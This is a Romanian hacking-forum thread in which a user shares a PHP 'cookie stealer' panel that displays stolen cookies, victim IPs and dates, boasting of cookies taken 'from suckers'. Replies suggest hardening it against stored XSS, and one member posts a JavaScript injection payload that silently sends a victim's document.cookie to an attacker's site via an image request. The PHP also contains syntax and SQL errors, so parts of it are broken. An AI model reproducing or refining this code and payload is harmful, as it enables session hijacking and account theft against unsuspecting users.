Jump to content
shadowSQLi

cookie stealer

Recommended Posts

<?php

//////////////////////
// Cookie stealer
/////////////////////

/*
Database stuff
*/
define(host, ""); //localhost as usual
define(user, ""); //root, gigel sau petrica
define(pass, ""); //parola de la user
define(db, ""); //numele la baza de date


try {

$db = new mysqli(host, user, pass, db);

} catch (mysqli_sql_exception $e) {

throw $e;

}


if(isset($_GET['act']) && ($_GET['act'] == "prune")){
//Va sterge rezultate mai vechi de 30 zile.
$del_oldrecords = "DELETE FROM `cookies` WHERE `Date` < DATEADD(day, -30, GETDATE())";

$db->query($del_oldrecords);

$affected_rows = $db->affected_rows;

print $affected_rows;

}



$cookie = "SELECT `ID`, `Cookie`, `IP`, `Date` FROM `cookies`";

$raw = $db->query($cookie);

if(!$raw)){

die('There was an error running the query [' . $db->error . ']')

}

$values = $raw->fetch_all(MYSQLI_ASSOC);

$results = $raw->num_rows;

print 'Prune data: <a href="cookie.php?act=prune">Erase old data</a>';

print 'We\'ve stealed '.number_format($results).' cookies from suckers.';

foreach($values as $key){

print '<tr><td>'.$key['ID'].'</td><td>'.$key['Cookie'].'</td><td>'.$key['IP'].'</td><td>'.$key['Date'].'</td></tr>';

}

?>

Link to comment
Share on other sites

Pentru ca copy paste

de unde concluzia ca am copiat? e facut de mine doar conexiunea spre mysql am copiat-o

De ce intr-un script folosesti mysqli si in celalalt mysql_*? Si de ce codul sql de insert are ca si valoare pentru campul ID mereu acelasi cod html?

Pentru ca ID e setat din phpmyadmin sa aibe autoincrement.

Edited by TheTime
Link to comment
Share on other sites

Si practic ce-ai facut tu daca ai zis c-ai copiat sqlul? ah, ai stocat un get...

11:16 AM - askwrite clicked Dislikes for this post: query SQL by shadowSQLi

11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi

11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi

11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi

11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi

=)))

Link to comment
Share on other sites

Ma bucur sa vad cateva linii de cod, mi-ai facut duminica mai frumoasa! :D

Ai un xss permanent in loguri, nu filtrezi deloc cookie-urile primite. Daca vrei sa folosesti pe bune scriptul, exista sanse ca altii sa incerce sa afle cine esti. Daca scriptul tau e vulnerabil, you're gonna have a bad time!

Si pune o parola pentru accesarea logurilor.

Link to comment
Share on other sites

Ma bucur sa vad cateva linii de cod, mi-ai facut duminica mai frumoasa! :D

Ai un xss permanent in loguri, nu filtrezi deloc cookie-urile primite. Daca vrei sa folosesti pe bune scriptul, exista sanse ca altii sa incerce sa afle cine esti. Daca scriptul tau e vulnerabil, you're gonna have a bad time!

Si pune o parola pentru accesarea logurilor.

Ok, multumesc o sa ma ocup acum:D

Link to comment
Share on other sites

  • Active Members

O idee mai buna pentru a nu redirectiona persoana de pe pagina este sa folosesti o imagine, faptul ca victima va fi redirectionata pe o pagina poate trezi suspiciuni.

<script>a=new Image();a.src="http://sitetau.com/cookie.php?shadow="+document.cookie;</script>

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...